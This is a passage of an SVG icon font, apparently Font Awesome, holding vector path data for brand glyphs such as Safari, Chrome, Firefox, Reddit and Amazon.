d="M184.2 270.9c0 22.0996 17.8994 40 39.7998 40s39.7998 -17.9004 39.7998 -40c0 -22 -17.8994 -39.8008 -39.7998 -39.8008s-39.7998 17.9004 -39.7998 39.8008zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352
c26.5 0 48 -21.5 48 -48zM142.9 270.9c0 -44.6006 36.3994 -80.9004 81.0996 -80.9004s81.0996 36.2002 81.0996 80.9004c0 44.7998 -36.3994 81.0996 -81.0996 81.0996s-81.0996 -36.2002 -81.0996 -81.0996zM317.4 180.2
c-4.60059 9.09961 -17.3008 16.7998 -34.1006 3.59961c0 0 -22.7002 -18 -59.2998 -18s-59.2998 18 -59.2998 18c-16.7998 13.2002 -29.5 5.5 -34.1006 -3.59961c-7.89941 -16.1006 1.10059 -23.7002 21.4004 -37c17.2998 -11.1006 41.2002 -15.2002 56.5996 -16.7998
l-12.8994 -12.9004c-18.2002 -18 -35.5 -35.5 -47.7002 -47.7002c-17.5996 -17.5996 10.7002 -45.7998 28.4004 -28.5996l47.6992 47.8994c18.2002 -18.1992 35.7002 -35.6992 47.7002 -47.8994c17.6006 -17.2002 46 10.7002 28.6006 28.5996l-47.7002 47.7002l-13 12.9004
c15.5 1.59961 39.0996 5.89941 56.2002 16.7998c20.3994 13.2998 29.2998 21 21.5 37z" />
    <glyph glyph-name="get-pocket" unicode="&#xf265;" 
d="M407.6 384c22.7002 0 40.4004 -18.2002 40.4004 -40.5996v-135.2c0 -124.7 -99.7998 -224.2 -223.8 -224.2c-124.5 0 -224.2 99.5 -224.2 224.2v135.2c0 22.0996 18.5 40.5996 40.5996 40.5996h367zM245.6 115.5c111.9 107.5 114.801 105.4 114.801 123.2
c0 16.8994 -13.8008 30.7002 -30.7002 30.7002c-16.9004 0 -14.9004 -2.40039 -105.5 -89.3008c-89.1006 85.5 -88.2002 89.3008 -105.2 89.3008c-16.9004 0 -30.7002 -13.8008 -30.7002 -30.7002c0 -18.1006 1.2002 -14.2998 114.9 -123.2
c11 -11.0996 30 -11.7998 42.3994 0z" />
    <glyph glyph-name="wikipedia-w" unicode="&#xf266;" horiz-adv-x="640" 
d="M640 396.8l-0.299805 -12.2002c-28.1006 -0.799805 -45 -15.7998 -55.7998 -40.2998c-25 -57.7998 -103.301 -240 -155.301 -358.6h-13.5996l-81.9004 193.1c-32.5 -63.5996 -68.2998 -130 -99.1992 -193.1c-0.300781 -0.299805 -15 0 -15 0.299805
c-46.9004 109.7 -96.1006 218.6 -143.101 328.6c-11.3994 26.7002 -49.3994 70 -75.5996 69.7002c0 3.10059 -0.299805 10 -0.299805 14.2002h161.899v-13.9004c-19.2002 -1.09961 -52.7998 -13.2998 -43.2998 -34.1992c21.9004 -49.7002 103.6 -240.301 125.6 -288.601
c15 29.7002 57.8008 109.2 75.3008 142.8c-13.9004 28.3008 -58.6006 133.9 -72.8008 160c-9.69922 17.8008 -36.0996 19.4004 -55.7998 19.7002v13.9004l142.5 -0.299805v-13.1006c-19.3994 -0.599609 -38.0996 -7.7998 -29.3994 -26.0996
c18.8994 -40 30.5996 -68.1006 48.0996 -104.7c5.59961 10.7998 34.7002 69.4004 48.0996 100.8c8.90039 20.6006 -3.89941 28.6006 -38.5996 29.4004c0.299805 3.59961 0 10.2998 0.299805 13.5996c44.4004 0.299805 111.101 0.299805 123.101 0.600586v-13.6006
c-22.5 -0.799805 -45.8008 -12.7998 -58.1006 -31.7002l-59.2002 -122.8c6.40039 -16.0996 63.3008 -142.8 69.2002 -156.7l122.4 282.601c-8.60059 23.0996 -36.4004 28.0996 -47.2002 28.2998v13.9004l127.8 -1.10059z" />
    <glyph glyph-name="safari" unicode="&#xf267;" horiz-adv-x="512" 
d="M236.9 191.2c0 9.09961 6.59961 17.7002 16.2998 17.7002c8.89941 0 17.3994 -6.40039 17.3994 -16.1006c0 -9.09961 -6.39941 -17.7002 -16.0996 -17.7002c-9 0 -17.5996 6.7002 -17.5996 16.1006zM504 192c0 -137 -111 -248 -248 -248s-248 111 -248 248
s111 248 248 248s248 -111 248 -248zM477.4 192c0 122.3 -99.1006 221.4 -221.4 221.4s-221.4 -99.1006 -221.4 -221.4s99.1006 -221.4 221.4 -221.4s221.4 99.1006 221.4 221.4zM404.9 95.4004c0 -3.60059 13 -10.2002 16.2998 -12.2002
c-27.4004 -41.5 -69.7998 -71.4004 -117.9 -83.2998l-4.39941 18.5c-0.300781 2.5 -1.90039 2.7998 -4.2002 2.7998c-1.90039 0 -3 -2.7998 -2.7998 -4.2002l4.39941 -18.7998c-13.2998 -2.7998 -26.7998 -4.2002 -40.3994 -4.2002c-36.3008 0 -72 10.2002 -103 29.0996
c1.69922 2.80078 12.1992 18 12.1992 20.2002c0 1.90039 -1.69922 3.60059 -3.59961 3.60059c-3.90039 0 -12.2002 -16.6006 -14.7002 -19.9004c-41.7998 27.7002 -72 70.5996 -83.5996 119.6l19.0996 4.2002c2.2002 0.600586 2.7998 2.2002 2.7998 4.2002
c0 1.90039 -2.7998 3 -4.39941 2.7998l-18.7002 -4.2998c-2.5 12.7002 -3.90039 25.5 -3.90039 38.5c0 37.0996 10.5 73.5996 30.2002 104.9c2.7998 -1.7002 16.1006 -10.8008 18.2998 -10.8008c1.90039 0 3.60059 1.40039 3.60059 3.30078
c0 3.89941 -14.7002 11.2998 -18 13.5996c28.2002 41.2002 71.0996 70.9004 119.8 81.9004l4.2002 -18.5c0.599609 -2.2002 2.2002 -2.80078 4.2002 -2.80078s3 2.80078 2.7998 4.40039l-4.2002 18.2998c12.2002 2.2002 24.5996 3.60059 37.0996 3.60059
c37.1006 0 73.3008 -10.5 104.9 -30.2002c-1.90039 -2.7998 -10.7998 -15.7998 -10.7998 -18c0 -1.90039 1.39941 -3.60059 3.2998 -3.60059c3.90039 0 11.2998 14.4004 13.2998 17.7002c41 -27.7002 70.2998 -70 81.7002 -118.2l-15.5 -3.2998
c-2.5 -0.599609 -2.7998 -2.2002 -2.7998 -4.39941c0 -1.90039 2.7998 -3 4.2002 -2.80078l15.7998 3.60059c2.5 -12.7002 3.89941 -25.7002 3.89941 -38.7002c0 -36.2998 -10 -72 -28.7998 -102.7c-2.7998 1.40039 -14.3994 9.7002 -16.5996 9.7002
c-2.10059 0 -3.7998 -1.7002 -3.7998 -3.59961zM371.7 337.6c-13 -12.1992 -134.2 -123.699 -137.601 -129.5l-96.5996 -160.5c12.7002 11.9004 134.2 124 137.3 129.301z" />
    <glyph glyph-name="chrome" unicode="&#xf268;" horiz-adv-x="495" 
d="M131.5 230.5l-76.4004 117.4c47.6006 59.1992 119 91.7998 192 92.0996c42.3008 0.299805 85.5 -10.5 124.801 -33.2002c43.3994 -25.2002 76.3994 -61.3994 97.3994 -103l-205.3 10.7998c-58.0996 3.40039 -113.4 -29.2998 -132.5 -84.0996zM164.4 192
c0 46.2998 37.3994 83.5996 83.5996 83.5996s83.5996 -37.3994 83.5996 -83.5996s-37.3994 -83.5996 -83.5996 -83.5996s-83.5996 37.3994 -83.5996 83.5996zM479.3 281.2c43.5 -111.9 0 -241.9 -107.399 -303.9c-43.4004 -25.2002 -91.3008 -35.3994 -137.801 -32.8994
l112.101 172.399c31.8994 49 31.2998 112.9 -6.60059 157.2zM133.7 144.4c26.2998 -51.7002 81.8994 -83.3008 139.5 -72.5l-63.7002 -124.801c-118.7 18.2002 -209.5 120.9 -209.5 244.9c0 50.0996 14.9004 96.9004 40.4004 135.9z" />
    <glyph glyph-name="firefox" unicode="&#xf269;" horiz-adv-x="480" 
d="M478.1 212.7c1.30078 -7.10059 1.90039 -14.2998 1.90039 -21.6006v-2.7998c-1.40039 -34 -11.5996 -67 -29.5996 -95.8994c-1 -1.5 -1.80078 -2.90039 -2.7002 -4.30078c2.7002 -7.19922 2.59961 -15.0996 -0.400391 -22.1992
c-5 -19.4004 -16.5996 -36.4004 -32.8994 -48.1006c-10.8008 -8.7002 -22.7002 -16.2002 -35.3008 -22.0996l-1.89941 -0.900391l-1 -0.5c-1.7002 -0.700195 -3.2998 -1.39941 -4.90039 -2.09961c-2.39941 -5.10059 -5.7998 -9.60059 -9.89941 -13.2998
c-2.5 -3.10059 -30.1006 -35 -113.801 -35c-23.5996 0 -47.1992 3.5 -69.7998 10.2998c0.799805 -0.299805 1.60059 -0.700195 2.40039 -1c-2.60059 0.899414 -5.2002 1.7998 -7.7002 2.7002c-19.0996 5.89941 -37.2002 14.5996 -53.7998 25.7998
c-40.7002 24.7002 -72.9004 61.2002 -92.2998 104.7c-14.5 31.3994 -21.1006 65.7998 -19.4004 100.3c-2.7998 -8.2998 -5.2002 -16.7002 -7 -25.2998c0 29.1992 5.5 58.0996 16.2002 85.1992c-5.5 -7.89941 -10.2998 -16.2998 -14.2998 -25.0996
c5.69922 23.0996 14.6992 45.2002 26.7998 65.5996c3.7002 6.10059 7.89941 11.9004 12.7002 17.1006v0.200195c-0.100586 2.69922 0.0996094 5.5 0.5 8.2998c1.5 16.2998 5.69922 32.2002 12.3994 47.0996l0.299805 0.700195c0.100586 0.299805 0 -1 0 -1.7002
s-0.0996094 -1.2998 0 -1c0.600586 2 1.40039 4 2.30078 5.90039c1 2.09961 2.39941 4.09961 3.89941 5.7998c0.100586 0.0996094 0.200195 0.200195 0.299805 0.400391c0.100586 0.199219 -0.399414 -2 -0.5 -3.10059v-0.5c0.600586 1.2002 1.30078 2.40039 2.2002 4.5
c2.10059 5.90039 6 11 11.1006 14.5l0.199219 0.100586c-0.299805 -9 1.2002 -17.9004 4.40039 -26.2002v-0.100586c0.299805 -0.399414 0.5 1.30078 0.900391 1.30078c0.0996094 0 0.199219 -0.100586 0.199219 -0.200195
c0.900391 -1.7998 1.80078 -3.60059 2.7002 -5.2002c1.2998 -2.2002 2.5 -4.2002 3.7002 -6l0.400391 -0.200195l0.199219 0.100586c2.60059 -4.2002 5.90039 -7.80078 9.7002 -10.9004h-0.200195l0.200195 -0.0996094c18.2998 3.59961 37.2002 2 54.6006 -4.7002
l0.0996094 0.0996094c2.09961 2.60059 4.59961 4.90039 7.2998 6.90039c0 -0.900391 -0.0996094 -1.7998 -0.200195 -2.7002c4 5 9.10059 9 15 11.5c-0.399414 -0.700195 -0.5 -1.40039 -0.5 -2.2002c7.40039 4.2998 15.5 7.40039 23.9004 9
c1.09961 0 -3.5 -1.7998 -5.09961 -3.09961c3.69922 1.59961 7.69922 2.59961 11.6992 2.7998c6.60059 0.700195 14 -2.09961 12.6006 -2.7002c-2.7998 -1 -5.5 -2.2002 -8.2002 -3.5c-0.799805 -0.700195 3.2002 0.200195 2.40039 -0.5
c-14 -9.2002 -24.8008 -22.5996 -30.8008 -38.2998v-0.0996094c2.5 -11 11.4004 -19.3008 22.5 -21.1006c31.5 -3 37.5 -5.59961 38.4004 -9.09961v-1.5c-0.0996094 -1 -0.200195 -1.90039 -0.299805 -2.7998c-1.2002 -6.90039 -4.90039 -13.2002 -10.2002 -17.7002
c-1.40039 -1.2998 -2.90039 -2.5 -4.5 -3.5c-1.09961 -0.700195 -6.40039 -2.7998 -12.7998 -5.60059c-7.90039 -3.19922 -15.5 -7.09961 -22.7002 -11.5996c-1.2998 -0.799805 -2.40039 -1.7002 -3.40039 -2.7002c-0.399414 -0.399414 -1.19922 -1.5 -1.19922 -1.5
v-0.0996094c0.5 -1.2002 1 -2.40039 1.19922 -3.7002c-1.39941 1.7002 -2.69922 1.09961 -1.89941 -0.5c0.899414 -2.5 1.2998 -5.2002 1.09961 -7.7998c0.200195 -4.7998 -0.700195 -9.60059 -2.59961 -14c-2.10059 1.5 -4.2998 2.89941 -6.60059 4.09961h-0.199219
c2.5 -1.59961 4.2998 -3.89941 5.39941 -6.59961c0.700195 -2.2002 -0.299805 -2.7002 -0.299805 -2.7002c-1.40039 2 -3.09961 3.59961 -5.2002 4.7002c-3.09961 1.7998 -8.7998 4.7002 -11.3994 5.7998c-0.300781 -0.200195 -0.5 -0.0996094 -0.800781 -0.200195
c0.800781 -1.2998 2.10059 -3.7998 2.10059 -3.7998s-1.7998 1.09961 -4.7998 2.59961c-3.90039 -1.7998 -7.2002 -4.89941 -9.30078 -8.69922c-3.5 -7.7002 -3.09961 -16.7002 1 -24.1006c4 -6 9.10059 -11.2002 15 -15.2002
c0.400391 -0.299805 -3.39941 1.10059 -3.09961 0.800781c4.59961 -3.2002 9.40039 -6.10059 14.4004 -8.60059c1.5 -1 -5 1.2002 -3.40039 0.299805c1.40039 -0.899414 2.7998 -1.69922 4.2998 -2.5c22.9004 -12.0996 38.9004 0.400391 56.4004 2.90039
c16.7998 3 33.7998 -3.59961 44.2002 -17c6 -8.5 -0.600586 -16.7002 -9 -14h-0.200195c-8.60059 2.90039 -19.1006 -4.2998 -36.6006 -14c-17.2998 -8.2998 -36.8994 -10.5996 -55.5996 -6.59961c-4.7998 0.899414 -9.40039 2.09961 -14 3.69922l-2 0.700195
l0.200195 -0.299805c8.7998 -12.2002 19.8994 -22.5 32.7998 -30.2998c8.7002 -4.40039 17.9004 -7.5 27.4004 -9.2998c8 -1.90039 16.1992 -2.80078 24.5 -2.80078c61 -0.0996094 110.6 49.4004 110.6 110.4c0.0996094 15.9004 -3.09961 31.7998 -9.2998 46.5
c20.7002 -12.2998 37.5996 -30.2002 48.7998 -51.5c-13.9004 40.5996 -40.2998 56.4004 -64.7002 76.5996c-19.5996 14.8008 -34.7002 34.9004 -43.3994 57.9004c-25.2002 67.7998 33.0996 132.9 33.0996 132.9s-3.59961 -15.1006 27.4004 -44.3008
c6.39941 -5.89941 16.7998 -14.5 28.8994 -26.6992c1.7002 9.2998 4.2002 18.3994 7.40039 27.2998c2.5 -14.7002 7.7998 -28.7998 15.3994 -41.6006c11.7002 -16.6992 21.9004 -25.5996 30.7002 -40c1.90039 -2.5 3.7998 -5.19922 5.60059 -7.89941
c5.09961 -7.2002 9.5 -14.7998 13.2998 -22.7998c6 -12 10.7998 -24.5 14.5 -37.4004c3 -10.4004 4.89941 -20.9004 5.7998 -31.5996c2.90039 3.89941 4.7002 5.89941 4.7002 5.89941s0.700195 -2.59961 1.39941 -7.09961zM179.1 310.3
c-0.5 -1.2002 -0.899414 -2.2998 -1.2998 -3.5c0.400391 1.2002 0.900391 2.40039 1.2998 3.5z" />
    <glyph glyph-name="opera" unicode="&#xf26a;" horiz-adv-x="496" 
d="M313.9 415.3c-170.2 0 -252.601 -223.8 -147.5 -355.1c36.5 -45.4004 88.5996 -75.6006 147.5 -75.6006c36.2998 0 70.2998 11.1006 99.3994 30.4004c-43.7998 -39.2002 -101.899 -63 -165.3 -63c-3.90039 0 -8 0 -11.9004 0.299805
c-131.5 6.10059 -236.1 114.601 -236.1 247.7c0 137 111 248 248 248h0.799805c63.1006 -0.299805 120.7 -24.0996 164.4 -63.0996c-29 19.3994 -63.1006 30.3994 -99.2998 30.3994zM415.7 17.5996c-40.9004 -24.6992 -90.7002 -23.5996 -132 5.80078
c56.2002 20.5 97.7002 91.5996 97.7002 176.6c0 84.7002 -41.2002 155.8 -97.4004 176.6c41.7998 29.2002 91.2002 30.3008 132.9 5c105.899 -98.6992 105.5 -265.699 -1.2002 -364z" />
    <glyph glyph-name="internet-explorer" unicode="&#xf26b;" horiz-adv-x="511" 
d="M483.049 288.294c25.1963 -45.4473 33.2578 -97.5811 26.8516 -141.162h-328.792c0 -100.432 144.31 -136.029 196.818 -47.4355h120.833c-32.5645 -91.7285 -119.689 -146.022 -216.813 -146.022c-35.1367 0 -70.2725 0.143555 -101.695 15.5732
c-87.3975 -44.4941 -180.251 -56.5693 -180.251 42.0059c0 45.8066 23.2461 107.096 43.9922 145.022c35.1357 63.7227 81.4121 124.875 135.687 173.168c-43.7061 -18.8604 -91.125 -66.2959 -121.977 -101.158c25.877 112.787 129.466 193.638 237.098 186.457
c130.032 59.7939 209.673 34.1445 209.673 -38.5771c0 -27.4326 -10.5684 -63.2959 -21.4238 -87.8711zM64.5586 101.123c-73.001 -152.4 11.5254 -172.244 100.267 -123.304c-46.5635 27.4326 -82.5557 72.1533 -100.267 123.304zM180.536 209.996h207.961
c-2 55.1514 -50.5635 94.8711 -103.981 94.8711c-53.7041 0 -101.979 -39.7197 -103.979 -94.8711zM365.072 397.596c46.2764 -18.002 85.9824 -57.2939 112.263 -99.5859c7.1416 18.8604 14.5693 47.8643 14.5693 67.8672c0 32.0049 -22.8525 53.7217 -54.2744 53.7217
c-23.9951 0 -51.1328 -11.7158 -72.5576 -22.0029z" />
    <glyph glyph-name="contao" unicode="&#xf26d;" horiz-adv-x="512" 
d="M45.4004 143c14.3994 -67.0996 26.3994 -129 68.1992 -175h-79.5996c-18.7002 0 -34 15.2002 -34 34v380c0 18.7002 15.2002 34 34 34h57.7002c-13.7998 -12.5996 -26.1006 -27.2002 -36.9004 -43.5996c-45.3994 -70 -27 -146.801 -9.39941 -229.4zM478 416
c18.7998 0 34 -15.2002 34 -34v-380.1c0 -18.8008 -15.2998 -34 -34 -34h-52.0996c38.6992 38.3994 60.5996 92.0996 57.3994 163.6l-137.399 -29.5996c-1.7002 -32.5 -12.9004 -63.8008 -57.4004 -73.2002c-24.9004 -5.2998 -45.4004 0.599609 -58.2998 11.7002
c-15.7998 13.5 -28.4004 31 -49.5 131.199c-21.4004 100.5 -17 121.601 -8.2002 140.301c7.2998 15.2998 23.7002 29.2998 48.2998 34.5996c44.7998 9.40039 67.7002 -14.9004 82.6006 -43.9004l137.1 29.3008c-13.5 34.5996 -31.2998 62.6992 -52.7002 84.0996h90.2002z
" />
    <glyph glyph-name="500px" unicode="&#xf26e;" horiz-adv-x="447" 
d="M103.3 103.7c-6.5 14.2002 -6.89941 18.2998 7.40039 23.0996c25.5996 8 8 -9.2002 43.2002 -49.2002h0.299805v93.9004c1.2002 50.2002 44 92.2002 97.7002 92.2002c53.8994 0 97.6992 -43.5 97.6992 -96.7998c0 -63.4004 -60.7998 -113.2 -128.5 -93.3008
c-10.5 4.2002 -2.09961 31.7002 8.5 28.6006c53 0 89.4004 10.0996 89.4004 64.3994c0 61 -77.0996 89.6006 -116.9 44.6006c-23.5 -26.4004 -17.5996 -42.1006 -17.5996 -157.601c50.7002 -31 118.3 -22 160.4 20.1006c24.7998 24.7998 38.5 58 38.5 93
c0 35.2002 -13.8008 68.2002 -38.8008 93.2998c-24.7998 24.7998 -57.7998 38.5 -93.2998 38.5s-68.7998 -13.7998 -93.5 -38.5c-0.299805 -0.299805 -16 -16.5 -21.2002 -23.9004l-0.5 -0.599609c-3.2998 -4.7002 -6.2998 -9.09961 -20.0996 -6.09961
c-6.90039 1.69922 -14.2998 5.7998 -14.2998 11.7998v186.8c0 5 3.89941 10.5 10.5 10.5h241.3c8.2998 0 8.2998 -11.5996 8.2998 -15.0996c0 -3.90039 0 -15.1006 -8.2998 -15.1006h-223.2v-132.899h0.299805c104.2 109.8 282.801 36 282.801 -108.9
c0 -178.1 -244.801 -220.3 -310.101 -62.7998zM166.6 364.5c3.80078 18.7998 145.101 50.7998 238.301 -38.2002c8.5 -7.5 -9.5 -22.7998 -14.3008 -22.7998c-6.59961 0 -84.5996 87.9004 -209.399 40.4004c-10 -3.90039 -15.1006 16.3994 -14.6006 20.5996zM393 33.2998
c8.09961 8 27.5996 -12.5996 20.7002 -20.3994c-135.601 -135.601 -357.601 -52.1006 -381.601 121.3c-1.5 10.7002 28.9004 15.5 28.9004 3.2998c33 -165 222 -214.1 332 -104.2zM213.6 141.4c0 3.39941 2.30078 4.69922 20.4004 22.5996l-18.2002 18.2002
c-5.59961 5.59961 7.40039 17.2998 12.4004 17.2998c3.09961 0 2.89941 -0.700195 21.5 -19.5l17.8994 17.9004c6.10059 6.09961 22.5 -8.90039 16.2002 -15.7002l-18.2002 -18.2002l17.3008 -17.2998c7.7998 -7.7998 -5.30078 -18.2002 -10.7002 -18.2002
c-3.2002 0 -2.7002 0.200195 -22.2998 19.5c-19.7002 -19.7002 -18.5 -19.5 -22.3008 -19.5c-2.39941 0 -5.5 1.40039 -8.5 4.40039c-1.19922 1.19922 -5.5 4.5 -5.5 8.5z" />
    <glyph glyph-name="amazon" unicode="&#xf270;" horiz-adv-x="447" 
d="M257.2 285.3c0 39.2998 5.2002 69.2002 -35.5 69.1006c0 0 -37.9004 0 -54.2002 -49.5l-73.5 6.7998c0 49.2998 46.7002 104.3 134.7 104.3c87.7998 0 112.3 -57 112.3 -82.2998v-147.101c0 -27.5 32.2998 -52.7998 32.2998 -52.7998l-56.7998 -56
c-9.90039 9.2998 -38.7998 36.6006 -45.2998 46.7998c-45.2002 -70.7998 -183.5 -66.2998 -183.5 43.2002c0 102 120.8 115.7 169.5 117.5zM257.2 198.5v40.5996c-33.7002 -1.09961 -84.2002 -10.5996 -84.2002 -57.7998c0 -50.7998 84.2002 -62.7998 84.2002 17.2002z
M393.2 35c-7.7002 -10 -70 -67 -174.5 -67s-184.5 71.5 -209 101c-6.7998 7.7002 1 11.2998 5.5 8.2998c73.2998 -44.5 187.8 -117.8 372.5 -30.2998c7.5 3.7002 13.2998 -2 5.5 -12zM433 32.7998c-6.5 -15.7998 -16 -26.7998 -21.2002 -31
c-5.5 -4.5 -9.5 -2.7002 -6.5 3.7998s19.2998 46.5 12.7002 55c-6.5 8.30078 -37 4.30078 -48 3.2002c-10.7998 -1 -13 -2 -14 0.299805c-2.2998 5.7002 21.7002 15.5 37.5 17.5c15.7002 1.80078 41 0.800781 46 -5.69922c3.7002 -5.10059 0 -27.1006 -6.5 -43.1006z" />
    <glyph glyph-name="houzz" unicode="&#xf27c;" horiz-adv-x="414" 
d="M258.9 117.3h-104.601v-149.3h-154.3v448h109.5v-104.5l305.1 -85.5996v-257.9h-155.699v149.3z" />
    <glyph glyph-name="vimeo-v" unicode="&#xf27d;" 
d="M447.8 294.4c-2 -43.6006 -32.3994 -103.301 -91.3994 -179.101c-60.9004 -79.2002 -112.4 -118.8 -154.601 -118.8c-26.0996 0 -48.2002 24.0996 -66.2998 72.2998c-35.2002 129.2 -50.2002 204.9 -79.2998 204.9c-3.40039 0 -15.1006 -7.10059 -35.2002 -21.1006
l-21 27.2002c51.5996 45.2998 100.9 95.7002 131.8 98.5c34.9004 3.40039 56.2998 -20.5 64.4004 -71.5c28.7002 -181.5 41.3994 -208.899 93.5996 -126.7c18.7002 29.6006 28.7998 52.1006 30.2002 67.6006c4.7998 45.8994 -35.7998 42.7998 -63.2998 31
c22 72.0996 64.0996 107.1 126.2 105.1c45.7998 -1.2002 67.5 -31.0996 64.8994 -89.3994z" />
    <glyph glyph-name="black-tie" unicode="&#xf27e;" 
d="M0 416h448v-448h-448v448zM316.5 90.7998l-64.5 184l64.4004 86.6006h-184.9l64.5 -86.6006l-64.5 -184l92.5 -88.7002z" />
    <glyph glyph-name="fonticons" unicode="&#xf280;" 
d="M0 416h448v-448h-448v448zM187 275.1c11.9004 0 16.5996 -4.2998 16.2998 -23l50.7002 6.10059c0 44.5996 -30.5996 52.7998 -64.7002 52.7998c-50.7998 0 -77.2998 -20.4004 -77.2998 -70v-21h-28v-37.4004h22.2002c2.89941 0 5.7998 0 5.7998 -2.2998v-111.399
c0 -5.60059 -1.5 -7.30078 -6.7002 -7.90039l-21.2998 -2v-25.7002h130.7v25.1006l-43.5 4.09961c-5.2002 0.599609 -3.2002 1.5 -3.2002 7.2998v112.9h55.7002l11.0996 37.2998h-67.3994c-2.90039 0 0.599609 2 0.599609 4.40039v23.2998
c0 17.5 0.599609 27.3994 19 27.3994zM261.3 33.2998h102.601v25.1006l-15.7002 2.59961c-5.5 0.900391 -2.90039 1.5 -2.90039 7.2998v151.7h-80.2002l-6.69922 -29.5l24.1992 -6.40039c3.80078 -1.19922 6.7002 -3.7998 6.7002 -7.89941v-107.9
c0 -5.59961 -2.39941 -6.7002 -7.59961 -7.2998l-20.4004 -2.59961v-25.1006zM342.1 288.8l21.9004 24.2002l-3.5 9.59961h-27.7002l-15.5 28h-9.2998l-15.5 -28h-27.7002l-3.5 -9.59961l21.7998 -24.2002l-9 -33.2002l7.30078 -7.2998l31.1992 16.6006l31.2002 -16.6006
l7.2998 7.2998z" />
    <glyph glyph-name="reddit-alien" unicode="&#xf281;" horiz-adv-x="511" 
d="M440.3 244.5c55.2998 0 73.7002 -74.0996 23.7998 -99.7002c2.2002 -7.89941 3.10059 -16.7002 3.10059 -25.0996c0 -83.7998 -94.4004 -151.7 -210.8 -151.7c-115.9 0 -210.301 67.9004 -210.301 151.7c0 8.39941 0.800781 16.7998 2.60059 24.7002
c-50.9004 25.5 -32.7002 100.1 22.8994 100.1c15 0 28.7002 -6.2002 38.4004 -16.2998c35.7998 24.7002 83.4004 40.5996 136.3 42.7998l30.4004 137.6c1.2998 4.90039 6.09961 8.40039 11 7.10059l97.3994 -21.6006c6.60059 12.7002 19.9004 22 35.3008 22
c22.0996 0 39.6992 -18.0996 39.6992 -39.6992c0 -21.6006 -17.6992 -39.7002 -39.6992 -39.7002c-21.6006 0 -39.2002 17.5996 -39.2002 39.2002l-88.2002 19.7998l-27.7002 -124.8c53.2998 -1.7002 101.4 -17.6006 137.101 -42.3008
c9.69922 9.7002 22.8994 15.9004 37.8994 15.9004zM129.4 139.1c0 -21.5996 17.6992 -39.2998 39.6992 -39.1992c21.6006 0 39.2002 17.5996 39.2002 39.1992c0 22.1006 -17.5996 39.7002 -39.2002 39.7002c-22.0996 0 -39.6992 -17.7002 -39.6992 -39.7002zM343.7 45.5996
c4 3.5 4 9.7002 -0.100586 13.7002c-3.5 3.5 -9.69922 3.5 -13.1992 0c-29 -29 -121.2 -28.5 -149 0c-3.5 3.5 -9.7002 3.5 -13.2002 0c-4 -4 -4 -10.2002 0 -13.7002c36.3994 -36.3994 139.1 -36.3994 175.5 0zM342.9 99.7998c22 0 39.5996 17.7002 39.6992 39.2002
c0 22.0996 -17.6992 39.7002 -39.6992 39.7002c-21.6006 0 -39.2002 -17.7002 -39.2002 -39.7002c0 -21.5996 17.5996 -39.2002 39.2002 -39.2002z" />
    <glyph glyph-name="edge" unicode="&#xf282;" horiz-adv-x="512" 
d="M25.7139 219.837c0.111328 0.162109 0.230469 0.323242 0.341797 0.485352c-0.0205078 -0.162109 -0.0449219 -0.323242 -0.0644531 -0.485352h-0.277344zM486.286 204.329l0.000976562 -52.0645h-314.073c1.38379 -128.497 191.392 -124.065 272.255 -67.5713v-104.404
c-47.3555 -28.5244 -156.774 -53.1709 -240.132 -21.3242c-70.6191 27.1406 -119.913 100.528 -120.743 171.977c-1.10742 92.2188 45.6943 153.422 120.742 188.314c-15.7852 -19.9395 -27.9697 -41.54 -34.3389 -78.9258h175.853
c10.2471 104.957 -99.4189 104.957 -99.4189 104.957c-103.302 -3.58984 -177.945 -63.6543 -220.375 -124.966c14.5615 114.465 92.9062 219.955 232.837 219.678c85.0195 0 157.605 -39.8779 198.593 -113.265c21.0469 -37.9404 28.8008 -78.373 28.8008 -122.405z" />
    <glyph glyph-name="codiepie" unicode="&#xf284;" horiz-adv-x="472" 
d="M422.5 245.1c30.7002 0 33.5 -53.0996 -0.299805 -53.0996h-10.7998v-44.2998h-26.6006v97.3994h37.7002zM472 95.4004c-42.0996 -91.9004 -121.6 -151.4 -224 -151.4c-137 0 -248 111 -248 248s111 248 248 248c97.4004 0 172.8 -53.7002 218.2 -138.4l-186 -108.8z
M433.5 82.9004l-60.2998 30.6992c-27.1006 -44.2998 -70.4004 -71.3994 -122.4 -71.3994c-82.5 0 -149.2 66.7002 -149.2 148.899c0 82.5 66.7002 149.2 149.2 149.2c48.4004 0 88.9004 -23.5 116.9 -63.3994l59.5 34.5996c-40.7002 62.5996 -104.7 100 -179.2 100
c-121.2 0 -219.5 -98.2998 -219.5 -219.5s98.2998 -219.5 219.5 -219.5c78.5996 0 146.5 42.0996 185.5 110.4z" />
    <glyph glyph-name="modx" unicode="&#xf285;" 
d="M356 206.2l36.7002 -23.7002v-214.5l-133 83.7998zM440 373l-83.2002 -134.3l-153.5 96.5l23 37.7998h213.7zM351 230.2l-249.8 -57.7002l-46 29v214.5zM97 153.8l249.7 57.7002l-125 -200.5h-213.7z" />
    <glyph glyph-name="fort-awesome" unicode="&#xf286;" horiz-adv-x="511" 
d="M489.2 160.1c2.59961 0 4.59961 -2 4.5 -4.59961v-219.5h-182.9v96c0 72.5996 -109.7 72.5996 -109.7 0v-96h-182.899v219.5c0 2.59961 2 4.59961 4.59961 4.59961h27.4004c2.59961 0 4.59961 -2 4.59961 -4.59961v-32h36.6006v178.3
c0 2.60059 2 4.60059 4.59961 4.60059h27.4004c2.59961 0 4.59961 -2 4.59961 -4.60059v-32h36.2998v32c0 2.60059 2 4.60059 4.60059 4.60059h27.3994c2.60059 0 4.60059 -2 4.60059 -4.60059v-32h36.5996v32c0 6 8 4.60059 11.7002 4.60059v111.699
c-5.40039 2.60059 -9.10059 8.30078 -9.10059 14.3008c0 20.7998 31.4004 20.6992 31.4004 0c0 -6 -3.7002 -11.7002 -9.09961 -14.3008v-4.89941c7.69922 1.7998 15.6992 2.89941 23.6992 2.89941c11.7002 0 22.9004 -4.2998 32.6006 -4.2998
c8.89941 0 18.8994 4.2998 24 4.2998c2.59961 0 4.59961 -2 4.59961 -4.59961v-60c0 -6.90039 -23.0996 -8 -27.7002 -8c-10.5 0 -20.5 4.2998 -31.3994 4.2998c-8.60059 0 -17.4004 -1.39941 -25.7002 -3.39941v-38c3.7002 0 11.7002 1.39941 11.7002 -4.60059v-32h36.5996
